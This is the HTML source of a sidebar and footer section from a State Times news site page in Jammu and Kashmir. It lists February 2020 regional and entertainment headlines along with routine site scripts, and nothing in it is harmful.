							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/law-order-situation-in-jk-satisfactory-dgp/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/dilbagh.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/dilbagh.jpg" alt="Law & order situation in J&K satisfactory: DGP" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/law-order-situation-in-jk-satisfactory-dgp/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/dilbagh.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/dilbagh.jpg" alt="Law & order situation in J&K satisfactory: DGP" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/law-order-situation-in-jk-satisfactory-dgp/">Law &#038; order situation in J&#038;K satisfactory: DGP</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:16+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/sc-seeks-jk-admns-response-on-plea-against-mehboobas-detention-under-psa/"><img src="http://news.statetimes.in/wp-content/uploads/2018/09/supreme-court-copy13.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/09/supreme-court-copy13.jpg" alt="SC seeks J&K Admn’s response on plea against Mehbooba's detention under PSA" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/sc-seeks-jk-admns-response-on-plea-against-mehboobas-detention-under-psa/"><img src="http://news.statetimes.in/wp-content/uploads/2018/09/supreme-court-copy13.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2018/09/supreme-court-copy13.jpg" alt="SC seeks J&K Admn’s response on plea against Mehbooba's detention under PSA" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/sc-seeks-jk-admns-response-on-plea-against-mehboobas-detention-under-psa/">SC seeks J&#038;K Admn’s response on plea against Mehbooba&#8217;s detention under PSA</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:14+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/illegal-constructions-at-patnitop-db-directs-cbi-to-file-status-report-on-march-30/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Illegal constructions at Patnitop: DB directs CBI to file status report on March 30" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/illegal-constructions-at-patnitop-db-directs-cbi-to-file-status-report-on-march-30/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Illegal constructions at Patnitop: DB directs CBI to file status report on March 30" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/illegal-constructions-at-patnitop-db-directs-cbi-to-file-status-report-on-march-30/">Illegal constructions at Patnitop: DB directs CBI to file status report on March 30</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:07:12+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/advisor-sharma-to-head-reconstituted-board-of-technical-education/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Advisor Sharma to head reconstituted Board of Technical Education" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/advisor-sharma-to-head-reconstituted-board-of-technical-education/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Advisor Sharma to head reconstituted Board of Technical Education" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/advisor-sharma-to-head-reconstituted-board-of-technical-education/">Advisor Sharma to head reconstituted Board of Technical Education</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:05:10+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/govt-extends-amnesty-for-settlement-of-unresolved-issues-in-old-tax-regime/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Govt extends amnesty for settlement of unresolved issues in old tax regime" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/govt-extends-amnesty-for-settlement-of-unresolved-issues-in-old-tax-regime/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Govt extends amnesty for settlement of unresolved issues in old tax regime" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/govt-extends-amnesty-for-settlement-of-unresolved-issues-in-old-tax-regime/">Govt extends amnesty for settlement of unresolved issues in old tax regime</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:05:03+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/brittle-quiet-after-2-days-of-communal-mayhem-in-northeast-delhi-toll-rises-to-24/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Car.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Car.jpg" alt="Brittle quiet after 2 days of communal mayhem in northeast Delhi, toll rises to 24" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/brittle-quiet-after-2-days-of-communal-mayhem-in-northeast-delhi-toll-rises-to-24/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Car.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Car.jpg" alt="Brittle quiet after 2 days of communal mayhem in northeast Delhi, toll rises to 24" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/brittle-quiet-after-2-days-of-communal-mayhem-in-northeast-delhi-toll-rises-to-24/">Brittle quiet after 2 days of communal mayhem in northeast Delhi, toll rises to 24</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-02-27T02:03:51+00:00" class="entry-date">February 27, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/mankotia-appeals-youngsters-to-stay-away-from-drugs/">Mankotia appeals youngsters to stay away from drugs</a></li>

			
			<li><a href="http://news.statetimes.in/law-order-situation-in-jk-satisfactory-dgp/">Law &#038; order situation in J&#038;K satisfactory: DGP</a></li>

			
			<li><a href="http://news.statetimes.in/trumps-mediation-offer-on-kashmir-is-unfortunate-manohar/">Trump&#8217;s mediation offer on Kashmir is unfortunate: Manohar</a></li>

			
			<li><a href="http://news.statetimes.in/shaheed-manjeet-singh-club-wins-volleyball-tournament/">Shaheed Manjeet Singh Club wins volleyball tournament</a></li>

			
			<li><a href="http://news.statetimes.in/bsf-jawan-among-two-killed-in-mishaps-2/">BSF Jawan among two killed in mishaps</a></li>

			
			<li><a href="http://news.statetimes.in/one-injured-in-group-clash/">One injured in group clash</a></li>

			
			<li><a href="http://news.statetimes.in/man-electrocuted-14/">Man electrocuted</a></li>

			
			<li><a href="http://news.statetimes.in/samba-girl-attack-case-victim-succumbs/">Samba girl attack case; victim succumbs</a></li>

			
			<li><a href="http://news.statetimes.in/minor-girl-goes-missing-4/">Minor girl goes missing</a></li>

			
			<li><a href="http://news.statetimes.in/police-distributes-flowers-to-traffic-rule-abiders/">Police distributes flowers to traffic rule abiders</a></li>

			
			<li><a href="http://news.statetimes.in/absconder-nabbed-31/">Absconder nabbed</a></li>

			
			<li><a href="http://news.statetimes.in/ddc-reviews-functioning-of-jpdcl-rajouri/">DDC reviews functioning of JPDCL Rajouri</a></li>

			
			<li><a href="http://news.statetimes.in/dc-inaugurates-maiden-district-level-centre-for-women/">DC inaugurates maiden district level centre for women</a></li>

			
			<li><a href="http://news.statetimes.in/ddc-samba-reviews-functioning-of-icds/">DDC Samba reviews functioning of ICDS</a></li>

			
			<li><a href="http://news.statetimes.in/epfo-organises-awareness-workshop/">EPFO organises awareness workshop</a></li>

			
			<li><a href="http://news.statetimes.in/bhalla-inaugurates-salon-chain-gabru/">Bhalla inaugurates salon chain Gabru</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/way-forward-for-any-country-is-by-educating-itself-more-shah-rukh/"><img src="http://news.statetimes.in/wp-content/uploads/2016/11/Shah-Rukh-Khan-turns-51.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/11/Shah-Rukh-Khan-turns-51.jpg" alt="Way forward for any country is by educating itself more: Shah Rukh" width="265" height="168">			  <p class="slide-caption">Way forward for any country is by educating itself more: Shah Rukh</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/prabhas-to-work-in-mahanati-director-nag-ashwins-next/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Prabhas-to-work-in-Mahanati-director-Nag-Ashwins-next.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Prabhas-to-work-in-Mahanati-director-Nag-Ashwins-next.jpg" alt="Prabhas to work in 'Mahanati' director Nag Ashwin's next" width="265" height="168">			  <p class="slide-caption">Prabhas to work in &#8216;Mahanati&#8217; director Nag Ashwin&#8217;s next</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/colin-trevorrows-jurassic-world-3-titled-dominion/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/Death-toll-in-northeast-Delhi-violence-rises-to-20.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/Death-toll-in-northeast-Delhi-violence-rises-to-20.jpg" alt="Colin Trevorrow's 'Jurassic World 3' titled 'Dominion'" width="265" height="168">			  <p class="slide-caption">Colin Trevorrow&#8217;s &#8216;Jurassic World 3&#8217; titled &#8216;Dominion&#8217;</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/john-abraham-to-produce-biopic-on-revathi-roy/"><img src="http://news.statetimes.in/wp-content/uploads/2020/02/John-Abraham-to-produce-biopic-on-Revathi-Roy.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/02/John-Abraham-to-produce-biopic-on-Revathi-Roy.jpg" alt="John Abraham to produce biopic on Revathi Roy" width="265" height="168">			  <p class="slide-caption">John Abraham to produce biopic on Revathi Roy</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/bachchan-sir-and-i-are-at-loggerheads-in-gulabo-sitabo-ayushmann/"><img src="http://news.statetimes.in/wp-content/uploads/2016/09/Ayushmann-says-he-hasnt-opted-out-of-Manmarziyan.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/09/Ayushmann-says-he-hasnt-opted-out-of-Manmarziyan.jpg" alt="Bachchan sir and I are at loggerheads in 'Gulabo Sitabo': Ayushmann" width="265" height="168">			  <p class="slide-caption">Bachchan sir and I are at loggerheads in &#8216;Gulabo Sitabo&#8217;: Ayushmann</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1529</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href=""  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>0</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">thietbicuuhoa.com</a> <time>on 15 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/">CISF seizes 5 gold bars at Hyderabad Airport</a></span></h4>
                                    <p>I have read so many articles or reviews on the topic of the blogger ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">scr888 judi</a> <time>on 02 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/">Gold prices extend slide on lacklustre demand</a></span></h4>
                                    <p>With the desire comes having of invention. Even you feel hurt when he ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"272cf8497d","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2020-02-27 14:02:15 by W3 Total Cache
-->